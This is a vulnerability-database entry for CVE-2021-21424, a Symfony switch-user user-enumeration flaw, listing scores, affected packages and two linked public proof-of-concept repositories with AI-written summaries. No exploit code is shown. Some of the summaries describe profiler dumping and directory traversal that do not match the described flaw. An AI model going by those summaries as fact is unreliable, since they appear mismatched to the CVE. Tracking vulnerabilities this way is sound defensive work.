CVE-2021-21424

MEDIUM

Symfony 3.4.0-3.4.48 - Unauthorized User Enumeration via Switch User Functionality

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 2 public exploits for CVE-2021-21424. PoCs published by moften.

AI-analyzed exploit summary This repository contains a Python-based scanner for detecting multiple vulnerabilities in Symfony applications, including CRLF injection, Host Header Injection, and exposed Symfony Profiler endpoints. It performs safe, non-invasive checks without attempting exploitation.

Description

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that 403s are returned whether the user exists or not if a user cannot switch to a user or if the user does not exist. The patch for this issue is available for branch 3.4.

Exploits (2)

nomisec SCANNER
by moften · poc
https://github.com/moften/Symfony-CVE-Scanner-PoC-

This repository contains a Python-based scanner for detecting multiple vulnerabilities in Symfony applications, including CRLF injection, Host Header Injection, and exposed Symfony Profiler endpoints. It performs safe, non-invasive checks without attempting exploitation.

Classification
Scanner 95%
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: Symfony (various versions)
No auth needed
Prerequisites: Network access to the target Symfony application
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC
by moften · poc
https://github.com/moften/CVE-2021-21424

The repository contains a functional Python script that exploits CVE-2021-21424 by enumerating Symfony WebProfiler tokens and dumping sensitive information exposed via the profiler interface. The exploit leverages directory traversal to access internal server paths and environment variables.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Symfony 2.8 to 5.x
No auth needed
Prerequisites: Symfony WebProfiler or Dev Toolbar accessible in production · Network access to the target server
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (7)

Core 7
Core References

Scores

CVSS v3 5.3
EPSS 0.0034
EPSS Percentile 57.1%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

CWE
CWE-200 CWE-203
Status published
Products (10)
fedoraproject/fedora 33
fedoraproject/fedora 34
lexik/jwt-authentication-bundle 2.0.0 - 2.10.7Packagist
sensiolabs/symfony 2.8.0 - 3.4.48
symfony/maker-bundle 1.27.0 - 1.29.2Packagist
symfony/security 5.0.0 - 5.2.8Packagist
symfony/security-core 2.8.0 - 3.4.48Packagist
symfony/security-guard 2.8.0 - 3.4.48Packagist
symfony/security-http 5.1.0 - 5.2.8Packagist
symfony/symfony 2.8.0 - 3.4.49Packagist
Published May 13, 2021
Tracked Since Feb 18, 2026